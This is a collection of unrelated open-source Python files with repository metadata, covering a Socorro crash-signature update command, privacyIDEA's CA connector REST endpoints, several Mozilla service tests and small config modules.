def write_out(data, step):
with open('out.{0}.json'.format(step), 'w') as f:
json.dump(data, f, cls=MyEncoder, indent=4, sort_keys=True)
def read_in(from_step):
with open('out.{0}.json'.format(from_step)) as f:
data = json.load(f)
data['links'] = [Link(*l) for l in data['links']]
data['images'] = [Image(*l) for l in data['images']]
for doc in data['docs']:
doc['links'] = [Link(*l) for l in doc['links']]
return data
def config(section, key, memo={}):
if 'config' not in memo:
memo['config'] = ConfigParser()
memo['config'].read('config.ini')
conf = memo['config']
return conf.get(section, key)
def get_db():
conn = pymysql.connect(config('db', 'host'), config('db', 'user'),
config('db', 'pass'), charset='utf8')
cur = conn.cursor()
return conn, cur
|
mythmon/sumomo-importer
|
sumomomig/utils.py
|
Python
|
mpl-2.0
| 2,741
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""
Maintain Signature data using crash data in Elasticsearch.
"""
import datetime
from django.core.management.base import BaseCommand, CommandError
from django.utils import timezone
from django.utils.dateparse import parse_datetime
from crashstats.crashstats.models import Signature
from crashstats.supersearch.models import SuperSearch
from socorro.external.es.super_search_fields import SuperSearchFieldsData
from socorro.lib.datetimeutil import string_to_datetime
# Maximum number of results returned for a super search query
MAX_PAGE = 1000
class Command(BaseCommand):
help = "Updates the signatures table using crash data from Elasticsearch"
def add_arguments(self, parser):
parser.add_argument(
"--last-success",
default="",
help=(
"The start of the window to look at in YYYY-mm-ddTHH:MM format in UTC. "
"Defaults to run-time value minus 90 minutes."
),
)
parser.add_argument(
"--run-time",
default="",
help=(
"The end of the window to look at in YYYY-mm-ddTHH:MM format in UTC. "
"Defaults to now."
),
)
parser.add_argument(
"--dry-run", action="store_true", help="Whether or not to do a dry run."
)
def update_crashstats_signature(self, signature, report_date, report_build):
report_build = int(report_build)
report_date = string_to_datetime(report_date)
try:
sig = Signature.objects.get(signature=signature)
sig.first_build = min(report_build, sig.first_build)
sig.first_date = min(report_date, sig.first_date)
except Signature.DoesNotExist:
sig = Signature.objects.create(
signature=signature, first_build=report_build, first_date=report_date
)
sig.save()
def handle(self, **options):
start_datetime = options.get("last_success")
end_datetime = options.get("run_time")
if end_datetime:
end_datetime = parse_datetime(end_datetime)
else:
end_datetime = timezone.now()
if start_datetime:
start_datetime = parse_datetime(start_datetime)
# When run via cronrun, start_datetime is based on the last success
# and we want to increase the window by 10 minutes to get some
# overlap with the previous run
start_datetime = start_datetime - datetime.timedelta(minutes=10)
else:
# Default to end_datetime - 90 minutes
start_datetime = end_datetime - datetime.timedelta(minutes=90)
# Truncate seconds and microseconds
start_datetime = start_datetime.replace(second=0, microsecond=0)
end_datetime = end_datetime.replace(second=0, microsecond=0)
if not end_datetime > start_datetime:
raise CommandError("start time must be before end time.")
# Do a super search and get the signature, buildid, and date processed for
# every crash in the range
all_fields = SuperSearchFieldsData().get()
api = SuperSearch()
self.stdout.write("Looking at %s to %s" % (start_datetime, end_datetime))
params = {
"date": [
f">={start_datetime.isoformat()}",
f"<{end_datetime.isoformat()}",
],
"_columns": ["signature", "build_id", "date"],
"_facets_size": 0,
"_fields": all_fields,
# Set up first page
"_results_offset": 0,
"_results_number": MAX_PAGE,
}
results = {}
crashids_count = 0
while True:
resp = api.get(**params)
hits = resp["hits"]
for hit in hits:
crashids_count += 1
if not hit["build_id"]:
# Not all crashes have a build id, so skip the ones that don't.
continue
if hit["signature"] in results:
data = results[hit["signature"]]
data["build_id"] = min(data["build_id"], hit["build_id"])
data["date"] = min(data["date"], hit["date"])
else:
data = {
"signature": hit["signature"],
"build_id": hit["build_id"],
"date": hit["date"],
}
results[hit["signature"]] = data
# If there are no more crash ids to get, we return
total = resp["total"]
if not hits or crashids_count >= total:
break
# Get the next page, but only as many results as we need
params["_results_offset"] += MAX_PAGE
params["_results_number"] = min(
# MAX_PAGE is the maximum we can request
MAX_PAGE,
# The number of results Super Search can return to us that is hasn't returned so far
total - crashids_count,
)
signature_data = results.values()
# Save signature data to the db
for item in signature_data:
if options["dry_run"]:
self.stdout.write(
"Inserting/updating signature (%s, %s, %s)"
% (item["signature"], item["date"], item["build_id"])
)
else:
self.update_crashstats_signature(
signature=item["signature"],
report_date=item["date"],
report_build=item["build_id"],
)
self.stdout.write("Inserted/updated %d signatures." % len(signature_data))
|
lonnen/socorro
|
webapp-django/crashstats/crashstats/management/commands/updatesignatures.py
|
Python
|
mpl-2.0
| 5,999
|
import json
def test_patch_status(client, bugs, header_bot):
"""
Fetch detailled analysis, with bugs
"""
from shipit_uplift.models import BugResult
url = '/bugs/1139560/patches'
revision = '80c32af73390' # existing patch revision
branch = 'test'
# Check patches in bug payload
bug = BugResult.query.filter_by(bugzilla_id=1139560).one()
patches = bug.payload_data['analysis']['patches']
assert revision in patches
assert 'merge' not in patches[revision]
# Check there are no patch statuses at first
resp = client.get(url, headers=[
('Authorization', header_bot),
])
assert resp.status_code == 200
statuses = json.loads(resp.data.decode('utf-8'))
assert statuses == []
# Add a patch status
data = {
'group': 1,
'revision': revision,
'revision_parent': '0000001',
'branch': branch,
'status': 'failed',
'message': 'random mercurial error',
}
resp = client.post(url, data=json.dumps(data), headers=[
('Authorization', header_bot),
('Content-Type', 'application/json'),
])
assert resp.status_code == 200
# Check we now have 1 patch status attached to the bug
resp = client.get(url, headers=[
('Authorization', header_bot),
])
assert resp.status_code == 200
statuses = json.loads(resp.data.decode('utf-8'))
assert len(statuses) == 1
# Check patches in bug payload
bug = BugResult.query.filter_by(bugzilla_id=1139560).one()
patches = bug.payload_data['analysis']['patches']
assert revision in patches
assert 'merge' in patches[revision]
assert patches[revision]['merge'] == {
branch: False,
}
|
andrei987/services
|
src/shipit_uplift/tests/test_patch_status.py
|
Python
|
mpl-2.0
| 1,729
|
import importlib
import sys
sys.path.append("modules/problems/alltoall")
''' Temporarily using term "model" to represent some form of "operations"
'''
def get_model(params):
mod = importlib.import_module("app")
app = mod.get_app(params)
return app
|
undertherain/benchmarker
|
benchmarker/kernels/alltoall/openmpi.py
|
Python
|
mpl-2.0
| 264
|
# -*- coding: utf-8 -*-
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import responses
import pytest
import json
@responses.activate
def test_conf(mock_config):
'''
Test mail reporter configuration
'''
from shipit_static_analysis.report.mail import MailReporter
# Missing emails conf
with pytest.raises(AssertionError):
MailReporter({}, 'test_tc', 'token_tc')
# Missing emails
conf = {
'emails': [],
}
with pytest.raises(AssertionError):
MailReporter(conf, 'test_tc', 'token_tc')
# Valid emails
conf = {
'emails': [
'test@mozilla.com',
],
}
r = MailReporter(conf, 'test_tc', 'token_tc')
assert r.emails == ['test@mozilla.com', ]
conf = {
'emails': [
'test@mozilla.com',
'test2@mozilla.com',
'test3@mozilla.com',
],
}
r = MailReporter(conf, 'test_tc', 'token_tc')
assert r.emails == ['test@mozilla.com', 'test2@mozilla.com', 'test3@mozilla.com']
@responses.activate
def test_mail(mock_issues, mock_phabricator):
'''
Test mail sending through Taskcluster
'''
from shipit_static_analysis.report.mail import MailReporter
from shipit_static_analysis.revisions import MozReviewRevision, PhabricatorRevision
from shipit_static_analysis.report.phabricator import PhabricatorReporter
phab = PhabricatorReporter({
'url': 'http://phabricator.test/api/',
'api_key': 'deadbeef',
})
def _check_email(request):
payload = json.loads(request.body)
assert payload['subject'] in (
'[test] New Static Analysis MozReview #12345 - 1',
'[test] New Static Analysis Phabricator #42 - PHID-DIFF-test',
)
assert payload['address'] == 'test@mozilla.com'
assert payload['template'] == 'fullscreen'
assert payload['content'].startswith('3 Publishable issues on Mozreview')
return (200, {}, '') # ack
# Add mock taskcluster email to check output
responses.add_callback(
responses.POST,
'https://notify.taskcluster.net/v1/email',
callback=_check_email,
)
# Publish email
conf = {
'emails': [
'test@mozilla.com',
],
}
r = MailReporter(conf, 'test_tc', 'token_tc')
# Publish for mozreview
mrev = MozReviewRevision('abcdef:12345:1')
r.publish(mock_issues, mrev, diff_url=None)
prev = PhabricatorRevision('42:PHID-DIFF-test', phab)
r.publish(mock_issues, prev, diff_url=None)
|
srfraser/services
|
src/shipit_static_analysis/tests/test_reporter_mail.py
|
Python
|
mpl-2.0
| 2,723
|
class UNPREPARED(DataClassification):
editprotect=True
name="UNPREPARED"
usage = 'Applies to un-"prepared" datasets, datasets which have not had the prepare task run on them.'
parent = "RAW"
requirement= PHU({'{prohibit,re}.*?PREPAR*?': ".*?" })
newtypes.append(UNPREPARED())
|
pyrrho314/recipesystem
|
trunk/dontload-astrodata_Gemini/ADCONFIG_Gemini/classifications/status/gemdtype.UNPREPARED.py
|
Python
|
mpl-2.0
| 301
|
from django.apps import AppConfig
class GroupsConfig(AppConfig):
name = "agir.groups"
|
lafranceinsoumise/api-django
|
agir/groups/apps.py
|
Python
|
agpl-3.0
| 92
|
# -*- coding: utf-8 -*-
#
# 2015-05-15 Cornelius Kölbel <cornelius.koelbel@netknights.it>
# Initial writup
#
# License: AGPLv3
#
# This code is free software; you can redistribute it and/or
# modify it under the terms of the GNU AFFERO GENERAL PUBLIC LICENSE
# License as published by the Free Software Foundation; either
# version 3 of the License, or any later version.
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU AFFERO GENERAL PUBLIC LICENSE for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
__doc__ = """This is the REST API for managing CA connector definitions.
The CA connectors are written to the database table "caconnector".
The code is tested in tests/test_api_caconnector.py.
"""
from flask import (Blueprint, request)
from lib.utils import (send_result)
from ..lib.log import log_with
from flask import g
import logging
from privacyidea.lib.caconnector import (save_caconnector,
delete_caconnector,
get_caconnector_list)
from ..api.lib.prepolicy import prepolicy, check_base_action
from privacyidea.lib.policy import ACTION
from .auth import admin_required
log = logging.getLogger(__name__)
caconnector_blueprint = Blueprint('caconnector_blueprint', __name__)
@caconnector_blueprint.route('/<name>', methods=['GET'])
@caconnector_blueprint.route('/', methods=['GET'])
@log_with(log)
#@prepolicy(check_base_action, request, ACTION.CACONNECTORREAD)
def get_caconnector_api(name=None):
"""
returns a json list of the available applications
"""
g.audit_object.log({"detail": "{0!s}".format(name)})
role = g.logged_in_user.get("role")
res = get_caconnector_list(filter_caconnector_name=name,
return_config=(role == "admin"))
g.audit_object.log({"success": True})
return send_result(res)
@caconnector_blueprint.route('/<name>', methods=['POST'])
@log_with(log)
@prepolicy(check_base_action, request, ACTION.CACONNECTORWRITE)
@admin_required
def save_caconnector_api(name=None):
"""
returns a json list of the available applications
"""
param = request.all_data
param["caconnector"] = name
g.audit_object.log({"detail": "{0!s}".format(name)})
res = save_caconnector(param)
g.audit_object.log({"success": True})
return send_result(res)
@caconnector_blueprint.route('/<name>', methods=['DELETE'])
@log_with(log)
@prepolicy(check_base_action, request, ACTION.CACONNECTORDELETE)
@admin_required
def delete_caconnector_api(name=None):
"""
returns a json list of the available applications
"""
g.audit_object.log({"detail": "{0!s}".format(name)})
res = delete_caconnector(name)
g.audit_object.log({"success": True})
return send_result(res)
|
jalr/privacyidea
|
privacyidea/api/caconnector.py
|
Python
|
agpl-3.0
| 3,052
|